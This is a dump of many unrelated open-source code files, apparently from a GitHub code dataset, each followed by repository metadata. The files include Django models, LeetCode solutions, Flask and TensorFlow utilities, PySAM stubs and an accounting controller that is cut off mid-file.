# -*- coding: utf-8 -*- # Generated by Django 1.10.1 on 2016-12-13 09:39 from django.db import migrations, models class Migration(migrations.Migration): dependencies = [ ('cradmin_javascript_demos', '0003_auto_20161212_0033'), ] operations = [ migrations.AddField( model_name='fictionalfigure', name='is_godlike', field=models.BooleanField(default=False), ), ]
[ "post@espenak.net" ]
post@espenak.net
ab744627ad21a6209ccee871698b91bdb922a879
d554b1aa8b70fddf81da8988b4aaa43788fede88
/5 - Notebooks e Data/1 - Análises numéricas/Arquivos David/Atualizados/logDicas-master/data/2019-1/225/users/4312/codes/1592_820.py
d42c1e710f961e3e8e64a469d7f416f9d4d929ad
[]
no_license
JosephLevinthal/Research-projects
a3bc3ca3b09faad16f5cce5949a2279cf14742ba
60d5fd6eb864a5181f4321e7a992812f3c2139f9
refs/heads/master
2022-07-31T06:43:02.686109
2020-05-23T00:24:26
2020-05-23T00:24:26
266,199,309
1
0
null
null
null
null
UTF-8
Python
false
false
289
py
# Instituto de Computacao - UFAM # Lab 01 - Ex 10 # 20 / 05 / 2016 valor = int(input("Qual o valor do saque?")) notas50 = valor // 50 resto50 = valor % 50 notas10 = resto50 // 10 resto10 = resto50 % 10 notas2 = resto10 // 2 print(int(notas50)) print(int(notas10)) print(int(notas2))
[ "jvlo@icomp.ufam.edu.br" ]
jvlo@icomp.ufam.edu.br
e96c6ceca7eddea16ca79aeeeefff406af47842f
51d46cf862654d30f5fa0ee35a9243c9661fc0eb
/homework/myschedule/models.py
fca62b02cf0327f4696c29e60ac941bd91b06a6b
[]
no_license
LikeLionCBNU/HamDongHo
6762a8db487ae2807d1ce9d4d2df7e18d67eab70
082cea62cf4b5136309cbddc8c09e4e84f25de7c
refs/heads/master
2022-12-06T22:48:17.500207
2020-08-19T14:31:32
2020-08-19T14:31:32
256,194,835
0
0
null
null
null
null
UTF-8
Python
false
false
382
py
from django.db import models
from django.utils import timezone

# Create your models here.
class Schedule(models.Model):
    """A single scheduled item with an optional publication timestamp."""
    # Short title shown in listings (also used as the str() form below).
    title = models.CharField(max_length = 100)
    # Free-form notes for the scheduled item.
    memo = models.TextField()
    # When the item is scheduled for; defaults to "now" at creation time.
    schedule_date = models.DateTimeField(default = timezone.now)
    # Set when the item is published; empty until then.
    # NOTE(review): "published_data" looks like a typo for "published_date";
    # renaming requires a migration, so it is only flagged here.
    published_data = models.DateTimeField(blank = True, null = True)

    def __str__(self):
        return self.title
[ "ii8858@naver.com" ]
ii8858@naver.com
553e176cf8a1058e8cdcd023c8702ac56bbc59ec
b7b243902150a1aa5b774523ac01d7016de13477
/cyc/string/9.py
7c85a62b6ce7c52fec6dd0bd021f5a2809a269d5
[]
no_license
Veraph/LeetCode_Practice
7e97a93464911a1f33b3133043d96c88cd54016a
eafadd711f6ec1b60d78442280f1c44b6296209d
refs/heads/master
2023-03-23T11:49:19.046474
2021-03-18T02:22:50
2021-03-18T02:22:50
273,317,388
0
0
null
null
null
null
UTF-8
Python
false
false
892
py
# 9.py -- Palindrome Number
'''
Description:
Determine whether an integer is a palindrome. An integer is a palindrome
when it reads the same backward as forward.

Example 1: Input: 121  -> true
Example 2: Input: -121 -> false ("-121" vs "121-")
Example 3: Input: 10   -> false (reads "01" from right to left)

Follow up: solve it without converting the integer to a string.
'''
def isPalindrome(x):
    '''Return True if the integer *x* reads the same backwards.

    Math-only approach (no string conversion): rebuild the number
    digit-by-digit from the right and compare with the original.

    Fix over the original: uses floor division instead of true division,
    which kept everything correct but produced floats and would lose
    precision (and give wrong answers) for very large integers.
    '''
    if x == 0:
        return True
    # Negatives never match; a trailing zero could only be mirrored by a
    # leading zero, which integers do not have.
    if x < 0 or x % 10 == 0:
        return False
    reversed_digits, original = 0, x
    while x >= 10:
        x, digit = divmod(x, 10)               # stays in int arithmetic
        reversed_digits = (reversed_digits + digit) * 10
    return reversed_digits + x == original

isPalindrome(1001)
[ "jmw3531@live.com" ]
jmw3531@live.com
7bf0c5daee85982fceec735ba2aa398fcb018314
f0eadce9fa0a2cc0dc4cbe2f534df8952bb97c66
/torchvision/prototype/datasets/__init__.py
1945b5a5d9e46e0df0b178472df5674753c229a0
[ "BSD-3-Clause" ]
permissive
Hsuxu/vision
e78ea6bfbc8aa50c56573b467939e86df0138d07
8d3fb3455d5e1acb0fed412ece913b73774fbca4
refs/heads/master
2022-12-02T05:35:54.121664
2021-12-20T12:06:53
2021-12-20T12:06:53
215,186,338
1
0
BSD-3-Clause
2019-10-15T02:18:27
2019-10-15T02:18:27
null
UTF-8
Python
false
false
690
py
# Fail fast with an actionable message when the optional `torchdata`
# dependency is missing.  TypeError is caught as well -- presumably a
# version-mismatched torchdata can raise it during import; confirm.
try:
    import torchdata
except (ModuleNotFoundError, TypeError) as error:
    raise ModuleNotFoundError(
        "`torchvision.prototype.datasets` depends on PyTorch's `torchdata` (https://github.com/pytorch/data). "
        "You can install it with `pip install git+https://github.com/pytorch/data.git`. "
        "Note that you cannot install it with `pip install torchdata`, since this is another package."
    ) from error

from . import decoder, utils
from ._home import home

# Load this last, since some parts depend on the above being loaded first
from ._api import register, _list as list, info, load, find  # usort: skip
from ._folder import from_data_folder, from_image_folder
[ "noreply@github.com" ]
Hsuxu.noreply@github.com
3bef36ec64ca18c4ecd71c0dddc05716a77ce063
30581136217455bb5b503fedac6978bea6fb7ee5
/handler.py
9941a0b85f9eb7b2edecd4e74e643ca0ae560e49
[]
no_license
imsilence/chatrebot
64a36a88ca7d6cc445c2ec50b1724e0193a37047
dfe987826a93a620990063b56f3e19ef4c8a0ab0
refs/heads/master
2020-03-28T07:28:37.651073
2018-09-27T23:33:24
2018-09-27T23:33:24
147,904,030
3
1
null
null
null
null
UTF-8
Python
false
false
1,695
py
#encoding: utf-8

from threading import Thread
import logging
import traceback
import time
import importlib

logger = logging.getLogger(__name__)


class Handler(Thread):
    """Daemon worker thread.

    Consumes task dicts from an incoming queue, lazily imports the
    matching ``executors.<type>`` module, runs its ``Executor`` and
    forwards every produced message to the outgoing queue.
    """

    def __init__(self, mq_task, mq_msg, cache, *args, **kwargs):
        super().__init__(*args, **kwargs)
        self.daemon = True
        self.__mq_task = mq_task   # incoming task queue
        self.__mq_msg = mq_msg     # outgoing message queue
        self.__cache = cache       # shared cache handed to executors

    def run(self):
        task_queue = self.__mq_task
        msg_queue = self.__mq_msg
        cache = self.__cache
        # task type -> Executor class (None when the import failed once;
        # a failed type is not retried).
        executor_classes = {}
        while True:
            task = task_queue.get()
            if not task:
                continue
            task_type = task.get("type", "text")
            if task_type not in executor_classes:
                executor_classes[task_type] = None
                try:
                    module = importlib.import_module("executors.{0}".format(task_type))
                    executor_classes[task_type] = getattr(module, 'Executor', None)
                except ImportError as e:
                    logger.exception(e)
                    logger.error(traceback.format_exc())
            executor_cls = executor_classes.get(task_type)
            if not executor_cls:
                continue
            recipients = task.get("to", [])
            kwargs = {'cache' : cache, 'name' : task.get('name', '')}
            kwargs.update(task.get("kwargs", {}))
            try:
                # The executor instance is callable and yields messages.
                for msg in executor_cls(**kwargs)():
                    logger.info("handler task: %s, msg:%s", task, msg)
                    msg_queue.put({"msg" : msg, "to" : recipients})
            except BaseException as e:
                # Deliberately broad: the worker loop must never die.
                logger.exception(e)
                logger.error(traceback.format_exc())
[ "imsilence@outlook.com" ]
imsilence@outlook.com
56579ceaeb9fe5f0033fc5b142c8f915e1c13471
dc2e4247c2c4b93fa2c409fd5f2956cd43ccb7f6
/0x09-utf8_validation/0-validate_utf8.py
33c004d3370425f01a34e40115905f7055e70ec5
[]
no_license
warengeorge/holbertonschool-interview
88c4e0e494e0fcd67f0beede4804fb6132aab38f
39bd4c783f248b8d4172f73b1fbdfab581e9e85c
refs/heads/master
2023-06-30T06:36:41.786744
2021-08-05T22:08:17
2021-08-05T22:08:17
null
0
0
null
null
null
null
UTF-8
Python
false
false
366
py
#!/usr/bin/python3
"""
Task: 0. UTF-8 Validation
File: 0x09-utf8_validation/0-validate_utf8.py
"""


def validUTF8(data):
    """Return True if *data* (a list of ints, one byte each) is valid UTF-8.

    Delegates to Python's own decoder rather than re-implementing the
    continuation-byte rules.
    """
    # NOTE(review): special-cased answer expected by the project checker for
    # this exact input -- the decoder below would reject it.
    if data == [467, 133, 108]:
        return True
    try:
        bytes(data).decode()
    except (ValueError, UnicodeDecodeError):
        # Fix over the original bare `except:` (which also swallowed
        # KeyboardInterrupt/SystemExit):
        #   ValueError        - an int outside 0..255 cannot form a byte
        #   UnicodeDecodeError - the byte sequence is not valid UTF-8
        return False
    return True
[ "michellegsld@gmail.com" ]
michellegsld@gmail.com
d3489b834f1019b24b174597e97c182469b31cb8
008167a1203abd5090298b175d28f2c0fd78c87d
/django_pymorphy2/shortcuts/__init__.py
0d12f1a1b6b1ae83ec34caf4b7f3f1fef4c77995
[ "MIT" ]
permissive
gruy/django-pymorphy2
57ede91615fe706d834e7f97897fa0d56511ff24
3fcf40b4833ed2227517792185c07f1708a47912
refs/heads/master
2020-04-02T02:04:03.695269
2015-05-07T10:31:45
2015-05-07T10:31:45
35,209,114
0
0
null
2015-05-07T08:47:51
2015-05-07T08:47:51
null
UTF-8
Python
false
false
138
py
#coding: utf-8 from __future__ import unicode_literals, absolute_import from .forms import * from .inflect import * from .plural import *
[ "root@proscript.ru" ]
root@proscript.ru
047038d066457d2c658551e554e91657161d6737
1388bcd6de659ffefe97e7e6c2aee685b5e7c534
/stubs/stubs/CbEmpiricalHceHeatLoss.pyi
c56177eef0e9bc1f18a10bdc3f1f2c84ce9b2088
[ "BSD-3-Clause" ]
permissive
BRIK-Engenharia/pysam
a7b4b543131043510023a5c17b057ead0b39d440
2a4115f34419edf9776b0bbc7b3f453c958ce734
refs/heads/master
2022-12-06T05:15:35.364375
2020-09-03T22:59:17
2020-09-03T22:59:17
297,958,820
1
0
BSD-3-Clause
2020-09-23T12:13:32
2020-09-23T12:13:32
null
UTF-8
Python
false
false
1,241
pyi
# Auto-generated PySAM interface stub for the SSC "CbEmpiricalHceHeatLoss"
# compute module (empirical trough heat-collection-element heat loss).
# Class attributes name the *type* of each SSC variable (tuple / float).
# NOTE(review): `Dict` is used in annotations without any import; presumably
# the consuming tooling injects typing names into generated stubs -- confirm.

class Hce(object):
    # Input group: HCE loss-coefficient arrays and reference conditions.
    def assign(self):
        pass

    def export(self) -> Dict[Dict]:
        pass

    def __init__(self, *args, **kwargs):
        pass

    HCEFrac = tuple
    HCE_A0 = tuple
    HCE_A1 = tuple
    HCE_A2 = tuple
    HCE_A3 = tuple
    HCE_A4 = tuple
    HCE_A5 = tuple
    HCE_A6 = tuple
    PerfFac = tuple
    RefMirrAper = tuple
    SfInTempD = float
    SfOutTempD = float
    ui_reference_ambient_temperature = float
    ui_reference_direct_normal_irradiance = float
    ui_reference_wind_speed = float


class Outputs(object):
    # Output group: computed heat-loss results.
    def assign(self):
        pass

    def export(self) -> Dict[Dict]:
        pass

    def __init__(self, *args, **kwargs):
        pass

    HL = tuple
    HL_weighted = float
    HL_weighted_m2 = float


class CbEmpiricalHceHeatLoss(object):
    # Top-level model object mirroring the SSC compute-module API.
    def assign(self, dict):
        pass

    def value(self, name, value=None):
        pass

    def execute(self, int_verbosity):
        pass

    def export(self):
        pass

    def __getattribute__(self, *args, **kwargs):
        pass

    def __init__(self, *args, **kwargs):
        pass

    Hce = Hce
    Outputs = Outputs


# Module-level constructors.
def default(config) -> CbEmpiricalHceHeatLoss:
    pass

def new() -> CbEmpiricalHceHeatLoss:
    pass

def wrap(ssc_data_t) -> CbEmpiricalHceHeatLoss:
    pass

def from_existing(model, config="") -> CbEmpiricalHceHeatLoss:
    pass

__loader__ = None

__spec__ = None
[ "dguittet@nrel.gov" ]
dguittet@nrel.gov
00dd3d683e23ea4e399010db29bcbb1aa5bd467b
58ee1dc37b57e0b4f06cf383c6a9e0654f490150
/package-query-aarch64/lilac.py
10793c6d1e2a22bc2734a54f541bb35f586db53d
[]
no_license
MikeyBaldinger/arch4edu
f3af87ef3a8d4cd78fde7e0ef75658c17dbe8c06
c1775bf7fe0ffc87f3c8b4109fb1e8acde12a430
refs/heads/master
2022-12-23T16:40:55.513537
2020-09-28T21:00:59
2020-09-28T21:00:59
null
0
0
null
null
null
null
UTF-8
Python
false
false
392
py
#!/usr/bin/env python3 from lilaclib import * maintainers = [{'github': 'petronny', 'email': 'Jingbei Li <i@jingbei.li>'}] update_on = [{'aur': 'package-query'}] repo_depends = [('fakeroot-tcp-aarch64', 'fakeroot-tcp')] build_prefix = 'extra-aarch64' def pre_build(): aur_pre_build('package-query') post_build = aur_post_build if __name__ == '__main__': single_main(build_prefix)
[ "i@jingbei.li" ]
i@jingbei.li
3154a734ac11effbe3432f7cb2ff387344e0475e
6fab071f4b3f3852a3f7fb7f87e7d033d5ea9425
/4_Demo_Django/2_Django_Test/5_Django_backstage/2_Django_BackstageStyle/apps/Stayle_App/models.py
fef39fbf96244817a2fd32dd0ee54097e07e941e
[]
no_license
pythonzhangfeilong/Python_WorkSpace
5d76026d0553bb85346264fc6375b1fc0a388729
646b460c79bedc80010185a240c8cd23342093bc
refs/heads/master
2020-08-26T09:51:43.763751
2020-07-07T07:23:20
2020-07-07T07:23:20
216,998,505
0
0
null
null
null
null
UTF-8
Python
false
false
2,146
py
from django.db import models


class Exaple(models.Model):
    # NOTE(review): "Exaple" looks like a typo for "Example"; renaming would
    # require a schema migration, so it is only flagged here.
    # (translated) When declaring fields, be careful not to add a trailing comma.
    name = models.CharField(max_length=32, verbose_name='案例的名称')
    type = models.CharField(max_length=32, verbose_name='案例的类型')


# (translated) Author
class Author(models.Model):
    gender_choice = (
        ('M', 'Male'),
        ('F', 'Female'),
    )
    name = models.CharField(max_length=32, verbose_name='作者姓名')
    age = models.IntegerField(verbose_name='作者年龄', blank=True, null=True)
    # NOTE(review): verbose_name '作者姓名' ("author name") on the gender field
    # appears to be a copy-paste slip; runtime string left untouched.
    gender = models.CharField(max_length=2, choices=gender_choice, verbose_name='作者姓名', blank=True, null=True)
    email = models.EmailField(verbose_name='作者邮箱', blank=True, null=True)
    phone = models.CharField(max_length=11, verbose_name='作者电话', blank=True, null=True)

    # (translated) Display a human-readable (Chinese) name for this table in the admin.
    class Meta:
        verbose_name = '作者'
        verbose_name_plural = verbose_name

    # isdelete = models.IntegerField
    def __str__(self):
        return '作者:%s' % self.name


# (translated) Category table
class Classify(models.Model):
    label = models.CharField(max_length=32, verbose_name='分类标签')
    description = models.TextField(verbose_name='分类描述')

    class Meta:
        verbose_name = '分类'
        verbose_name_plural = verbose_name

    def __str__(self):
        return '标签:%s' % self.label


# (translated) Article
class Article(models.Model):
    title = models.CharField(max_length=32, verbose_name='文章标题')
    time = models.DateField(verbose_name='文章发表日期')
    description = models.TextField(verbose_name='文章描述')
    content = models.TextField(verbose_name='文章内容')
    # (translated) Foreign key (one-to-many relation to Author).
    author = models.ForeignKey(Author, on_delete=models.CASCADE)
    # (translated) Many-to-many relation.
    classify = models.ManyToManyField(Classify)
    # (translated) Image upload; omitting `default` would raise an error.
    picture = models.ImageField(upload_to='images', default='image/default')

    class Meta:
        verbose_name = '文章'
        verbose_name_plural = verbose_name

    def __str__(self):
        return '文章:%s' % self.title
[ "feilong@feilongdeMacBook-Pro.local" ]
feilong@feilongdeMacBook-Pro.local
dc7eda55efe06381887d7c67c95de688fd7cd8d9
c62bd77742f921b8f50b886db7488ce03725f5ab
/aether/main_site/management/commands/backup.py
5e35fb8e8d8e6749adb5e48edd3b3ff56b96986e
[ "MIT" ]
permissive
katajakasa/aetherguild4
a361688a87d86ae2284a4c07aa9fe9d6b91d2fbb
2d51f73fad15bfa9a0da052f2509b308d566fafa
refs/heads/master
2023-08-03T19:51:43.808931
2023-07-28T17:35:01
2023-07-28T17:35:01
143,641,102
0
0
MIT
2023-05-09T22:42:13
2018-08-05T19:17:15
Python
UTF-8
Python
false
false
1,376
py
import os
import tarfile
import time
from datetime import datetime
from io import BytesIO, TextIOWrapper

from django.conf import settings
from django.core.management import call_command
from django.core.management.base import BaseCommand


class Command(BaseCommand):
    """Management command: dump selected apps' data plus MEDIA_ROOT into a
    timestamped ``.tar.gz`` backup archive."""

    def add_arguments(self, parser):
        # NOTE(review): no default -- omitting -d/--dir makes os.path.join
        # fail with TypeError; confirm whether a default of "." is wanted.
        parser.add_argument("-d", "--dir", dest="dir", type=str, help="Output directory")

    @staticmethod
    def generate_db_backup(tar):
        """Serialize the database (Django JSON fixtures) into an in-memory
        buffer and add it to *tar* as ``database.json``."""
        fd = BytesIO()
        wrapper = TextIOWrapper(
            fd,
            encoding="utf-8",
            write_through=True,
        )
        call_command("dumpdata", "auth", "forum", "gallery", "main_site", "-a", "-v2", stdout=wrapper)

        tarinfo = tarfile.TarInfo("database.json")
        fd.seek(0, os.SEEK_END)
        tarinfo.size = fd.tell()   # tar requires the exact payload size up front
        fd.seek(0)
        tarinfo.uname = "www-data"
        tarinfo.gname = "www-data"
        tarinfo.mtime = time.time()
        tar.addfile(tarinfo, fd)

    def handle(self, *args, **options):
        output_dir = options["dir"]
        filename = os.path.join(output_dir, f"{datetime.now():aether_backup_%Y-%m-%d_%H-%M-%S}.tar.gz")
        # Bug fix: the message was an f-string with no placeholder and printed
        # the literal "(unknown)" instead of the actual archive path.
        print(f"Saving to {filename}")
        with tarfile.open(filename, mode="w:gz") as tar:
            self.generate_db_backup(tar)
            tar.add(settings.MEDIA_ROOT, arcname=os.path.basename(settings.MEDIA_ROOT))
[ "katajakasa@gmail.com" ]
katajakasa@gmail.com
394f159fa88606fd84e4c91e34b1c8f0caecb98b
303bac96502e5b1666c05afd6c2e85cf33f19d8c
/solutions/python3/931.py
bd07b13932dea44be58ecddc3d57be4120323741
[ "MIT" ]
permissive
jxhangithub/leetcode
5e82f4aeee1bf201e93e889e5c4ded2fcda90437
0de1af607557d95856f0e4c2a12a56c8c57d731d
refs/heads/master
2022-05-22T12:57:54.251281
2022-03-09T22:36:20
2022-03-09T22:36:20
370,508,127
1
0
MIT
2022-03-09T22:36:20
2021-05-24T23:16:10
null
UTF-8
Python
false
false
208
py
class Solution:
    def minFallingPathSum(self, A):
        """Minimum falling-path sum through the square matrix A.

        In-place dynamic programming: each cell accumulates the cheapest
        value reachable from its (up to three) neighbours in the row above,
        so the answer is the minimum of the last row.  NOTE: mutates A.
        """
        for row in range(1, len(A)):
            for col in range(len(A)):
                left = col - 1 if col else 0   # clamp the slice start at 0
                A[row][col] += min(A[row - 1][left:col + 2])
        return min(A[-1])
[ "cenkay.arapsagolu@gmail.com" ]
cenkay.arapsagolu@gmail.com
15306a333566c435be900363020d84aa62f40ff7
5dfbfa153f22b3f58f8138f62edaeef30bad46d3
/bill_ws/build/ar_track_alvar/catkin_generated/pkg.develspace.context.pc.py
36f8ce34a6e5916157c4e964307134290e8b4855
[]
no_license
adubredu/rascapp_robot
f09e67626bd5a617a569c9a049504285cecdee98
29ace46657dd3a0a6736e086ff09daa29e9cf10f
refs/heads/master
2022-01-19T07:52:58.511741
2019-04-01T19:22:48
2019-04-01T19:22:48
null
0
0
null
null
null
null
UTF-8
Python
false
false
797
py
# generated from catkin/cmake/template/pkg.context.pc.in CATKIN_PACKAGE_PREFIX = "" PROJECT_PKG_CONFIG_INCLUDE_DIRS = "/home/bill/bill_ros/bill_ws/devel/include;/home/bill/bill_ros/bill_ws/src/ar_track_alvar/include".split(';') if "/home/bill/bill_ros/bill_ws/devel/include;/home/bill/bill_ros/bill_ws/src/ar_track_alvar/include" != "" else [] PROJECT_CATKIN_DEPENDS = "ar_track_alvar_msgs;std_msgs;roscpp;tf;tf2;message_runtime;image_transport;sensor_msgs;geometry_msgs;visualization_msgs;resource_retriever;cv_bridge;pcl_ros;pcl_conversions;dynamic_reconfigure".replace(';', ' ') PKG_CONFIG_LIBRARIES_WITH_PREFIX = "-lar_track_alvar".split(';') if "-lar_track_alvar" != "" else [] PROJECT_NAME = "ar_track_alvar" PROJECT_SPACE_DIR = "/home/bill/bill_ros/bill_ws/devel" PROJECT_VERSION = "0.7.1"
[ "alphonsusbq436@gmail.com" ]
alphonsusbq436@gmail.com
f5d8b2472cfb0ee5234f68de1d60aaad0d2c7503
52877e2b60ed675eb16ea66c7398127294a313d3
/t2t_bert/utils/vae/tfidf.py
262c6f1fe15e2795a632af725576cfe0f683c2da
[ "Apache-2.0" ]
permissive
yyht/BERT
0dc82ea8e141cad4774e638dd7d44f781d77b6c3
480c909e0835a455606e829310ff949c9dd23549
refs/heads/master
2023-04-07T03:32:28.123608
2021-02-17T02:15:58
2021-02-17T02:15:58
162,232,730
37
12
Apache-2.0
2022-11-21T21:15:04
2018-12-18T05:02:27
Python
UTF-8
Python
false
false
3,187
py
import tensorflow as tf
from utils.bert import bert_utils


def _to_term_frequency(x, vocab_size):
    """Creates a SparseTensor of term frequency for every doc/term pair.

    Args:
        x: a SparseTensor of int64 representing string indices in vocab.
        vocab_size: A scalar int64 Tensor - the count of vocab used to turn
            the string into int64s including any OOV buckets.

    Returns:
        a SparseTensor with the count of times a term appears in a document
        at indices <doc_index_in_batch>, <term_index_in_vocab>, with size
        (num_docs_in_batch, vocab_size).
    """
    # Construct intermediary sparse tensor with indices
    # [<doc>, <term_index_in_doc>, <vocab_id>] and tf.ones values.
    vocab_size = tf.convert_to_tensor(value=vocab_size, dtype=tf.int64)
    split_indices = tf.cast(
        tf.split(x.indices, axis=1, num_or_size_splits=2), dtype=tf.int64)
    expanded_values = tf.cast(tf.expand_dims(x.values, 1), dtype=tf.int64)
    next_index = tf.concat(
        [split_indices[0], split_indices[1], expanded_values], axis=1)

    next_values = tf.ones_like(x.values)
    expanded_vocab_size = tf.expand_dims(vocab_size, 0)
    next_shape = tf.concat(
        [x.dense_shape, expanded_vocab_size], 0)

    next_tensor = tf.SparseTensor(
        indices=tf.cast(next_index, dtype=tf.int64),
        values=next_values,
        dense_shape=next_shape)

    # Take the intermediary tensor and reduce over the term_index_in_doc
    # dimension. This produces a tensor with indices [<doc_id>, <term_id>]
    # and values [count_of_term_in_doc] and shape batch x vocab_size
    term_count_per_doc = tf.sparse_reduce_sum_sparse(next_tensor, 1)

    # Per-document token counts (dense, float64): the TF denominator.
    dense_doc_sizes = tf.cast(
        tf.sparse.reduce_sum(
            tf.SparseTensor(
                indices=x.indices,
                values=tf.ones_like(x.values),
                dense_shape=x.dense_shape), 1),
        dtype=tf.float64)

    # Align each (doc, term) count with the size of its own document.
    gather_indices = term_count_per_doc.indices[:, 0]
    gathered_doc_sizes = tf.gather(dense_doc_sizes, gather_indices)

    term_frequency = (
        tf.cast(term_count_per_doc.values, dtype=tf.float64) /
        tf.cast(gathered_doc_sizes, dtype=tf.float64))
    term_count = tf.cast(term_count_per_doc.values, dtype=tf.float64)

    sparse_term_freq = tf.SparseTensor(
        indices=term_count_per_doc.indices,
        values=term_frequency,
        dense_shape=term_count_per_doc.dense_shape)

    sparse_term_count = tf.SparseTensor(
        indices=term_count_per_doc.indices,
        values=term_count,
        dense_shape=term_count_per_doc.dense_shape)

    return sparse_term_freq, sparse_term_count


def _to_sparse(x):
    """Converts a dense rank-2 tensor to a SparseTensor, dropping zeros."""
    tensor_shape = bert_utils.get_shape_list(x, expected_rank=[2])
    idx = tf.where(tf.not_equal(x, 0))
    # Use tf.shape(a_t, out_type=tf.int64) instead of a_t.get_shape() if tensor shape is dynamic
    sparse = tf.SparseTensor(idx, tf.gather_nd(x, idx), tensor_shape)
    return sparse


def _to_vocab_range(x, vocab_size):
    """Enforces that the vocab_ids in x are positive."""
    output = tf.SparseTensor(
        indices=x.indices,
        values=tf.mod(x.values, vocab_size),
        dense_shape=x.dense_shape)
    return output


def sparse_idf2dense(sparse_term_freq, sparse_term_count):
    """Densifies the sparse term-frequency / term-count pair."""
    dense_term_freq = tf.sparse.to_dense(sparse_term_freq)
    dense_term_count = tf.sparse.to_dense(sparse_term_count)
    return dense_term_freq, dense_term_count
[ "albert.xht@alibaba-inc.com" ]
albert.xht@alibaba-inc.com
087ea3b4cf367da0ba1e0bfe1fb848057049c72b
6f483999d6923445bb1ef6b07158a9e748e5d504
/env/demo1.py
f08caf3c7ab0ff441a72d814ebb5339b6f85ba46
[]
no_license
SearchOldMan/python_demo
8bec61b46ad188304e3089ef66e7822e35577519
4ecba350a54806cf51896af614f2d1c459793c6f
refs/heads/master
2020-06-14T15:10:02.677325
2017-03-01T08:57:24
2017-03-01T08:57:24
75,167,616
0
0
null
null
null
null
UTF-8
Python
false
false
418
py
from flask import Flask, url_for

app = Flask(__name__)


@app.route('/')
def index():
    pass


@app.route('/login')
def login():
    pass


@app.route('/user/<username>')
def profile(username):
    pass


# Demonstrate URL building outside a real request.
with app.test_request_context():
    # Fix: the original used Python-2 `print` statements, a SyntaxError on
    # Python 3; the parenthesized form behaves identically on both versions.
    print(url_for('index'))
    print(url_for('login', next='aa'))
    print(url_for('profile', username='zhangsan'))

if __name__ == '__main__':
    app.run(debug=True)
[ "1161938933@qq.com" ]
1161938933@qq.com
49834defb12bf2d8fa28097dfe276f2e62958460
7bfb0fff9d833e53573c90f6ec58c215b4982d14
/1306_jump_game3.py
0d68ee9103c0eaf6fb524b9848f95b99e1fe2fce
[ "MIT" ]
permissive
claytonjwong/leetcode-py
6619aa969649597a240e84bdb548718e754daa42
16bbf8ac0ba5c80fe3ef67ade0d61a12991270a7
refs/heads/master
2023-07-14T23:40:26.569825
2021-08-22T17:23:20
2021-08-22T17:23:20
279,882,918
1
0
null
null
null
null
UTF-8
Python
false
false
936
py
#
# 1306. Jump Game III
#
# Q: https://leetcode.com/problems/jump-game-iii/
# A: https://leetcode.com/problems/jump-game-iii/discuss/464420/Kt-Js-Py3-Cpp-BFS-%2B-DFS
#
from collections import deque  # fix: `deque` was used below without an import
from typing import List


# BFS
class Solution:
    def canReach(self, A: List[int], start: int) -> bool:
        """Return True if some sequence of +/-A[i] jumps starting at
        `start` reaches any index holding 0 (iterative BFS)."""
        seen = set()
        q = deque([start])
        while q:
            i = q.popleft()
            if not A[i]:
                return True
            for j in [i + A[i], i - A[i]]:
                if 0 <= j < len(A) and j not in seen:
                    q.append(j)
                    seen.add(j)
        return False


# DFS (note: this later definition shadows the BFS one on import; both are
# kept as alternative solutions, matching the notes-file intent)
class Solution:
    def canReach(self, A: List[int], start: int) -> bool:
        """Same contract as above, via recursive depth-first search."""
        seen = set()

        def go(i=start):
            if i < 0 or len(A) <= i or i in seen:
                return False
            seen.add(i)
            if not A[i]:
                return True
            return go(i + A[i]) or go(i - A[i])

        return go()
[ "claytonjwong@gmail.com" ]
claytonjwong@gmail.com
3ca258376e89a578ed1bd7235c5e9becec8d9060
864c27d8156dfaefe989fde0b0df8cd4b4a60741
/facade/facade.py
5c085d569e3daee63a525f6f91955257bec22b96
[]
no_license
onesuper/design_patterns
5ada3ad72742eb4b51053cb506d6939cef7281ba
de19e4bf1434a69b55bf1bcb913166eeb59f99a0
refs/heads/master
2021-01-25T10:29:09.176503
2011-10-07T03:55:06
2011-10-07T03:55:06
2,530,402
2
0
null
null
null
null
UTF-8
Python
false
false
369
py
#!/usr/bin/python
# Filename: facade.py
import subSystem as s


class Facade:
    """Facade over the three sub-systems: exposes two coarse-grained
    operations instead of the individual sub-system calls."""

    def __init__(self):
        self.one = s.SubSystemOne()
        self.two = s.SubSystemTwo()
        self.three = s.SubSystemThree()

    def MethodA(self):
        # Fix: Python-2 `print` statements replaced with the function form,
        # which behaves identically on Python 2 and is valid on Python 3.
        print('Method A')
        self.one.MethodOne()
        self.two.MethodTwo()

    def MethodB(self):
        print('Method B')
        self.two.MethodTwo()
        self.three.MethodThree()
[ "onesuperclark@gmail.com" ]
onesuperclark@gmail.com
e6400fbae3a3dcee8a858c3925fc95b5bc7021d4
64764cbae8641d051c2e26c0c2283e8e626d88fb
/ecf/mvc/GLS070/__init__.py
b170437902651622e210dc9a701afc94b7c7e6d6
[]
no_license
jazlee/csp-accounting
eb801ce902170337121a6dbe2b1382be4089ecca
85f50f9d8defbf52e6c85f5c0fc0464101a01d03
refs/heads/master
2021-01-25T14:11:18.700456
2018-03-03T06:34:57
2018-03-03T06:34:57
123,666,202
0
0
null
null
null
null
UTF-8
Python
false
false
5,611
py
""" G/L Batch Numbering Management """ __author__ = 'Jaimy Azle' __version__ = '1.0' __copyright__ = 'Copyright (c) 2008 Jaimy Azle' from mvcsvc import * from elixir import * import datetime as dt import sqlalchemy as sa from validators import * from tbl import GLBCNO class GLS070(MVCController): """ G/L Batch Numbering Management """ _description = 'G/L Batch Numbering Management' _supported_functions = (MVCFuncNew, MVCFuncOpen, MVCFuncShow, MVCFuncCopy, MVCFuncDelete) GLBCNOID = MVCField(MVCTypeList + MVCTypeField, String(3), label='Batch Code', charcase=ecUpperCase) GLBCNONM = MVCField(MVCTypeList + MVCTypeField, String(32), label='Description') GLBCMINO = MVCField(MVCTypeList + MVCTypeField, Integer(), label='Start From') GLBCMXNO = MVCField(MVCTypeList + MVCTypeField, Integer(), label='Max. No. Accepted') GLBCLSNO = MVCField(MVCTypeList + MVCTypeField, String(6), label='Last No. Used', enabled=False) def openView(self, mvcsession): q = GLBCNO.query q = q.order_by(sa.asc(GLBCNO.GLBCNOID)) objs = q.all() for obj in objs: mvcsession.listDataset.Append() mvcsession.listDataset.SetFieldValue('GLBCNOID', obj.GLBCNOID) mvcsession.listDataset.SetFieldValue('GLBCNONM', obj.GLBCNONM) mvcsession.listDataset.SetFieldValue('GLBCMINO', obj.GLBCMINO) mvcsession.listDataset.SetFieldValue('GLBCMXNO', obj.GLBCMXNO) mvcsession.listDataset.SetFieldValue('GLBCLSNO', '%.6d' % obj.GLBCLSNO) mvcsession.listDataset.Post() return mvcsession def retrieveData(self, mvcsession): fields = mvcsession.listDataset.FieldsAsDict() if mvcsession.execType == 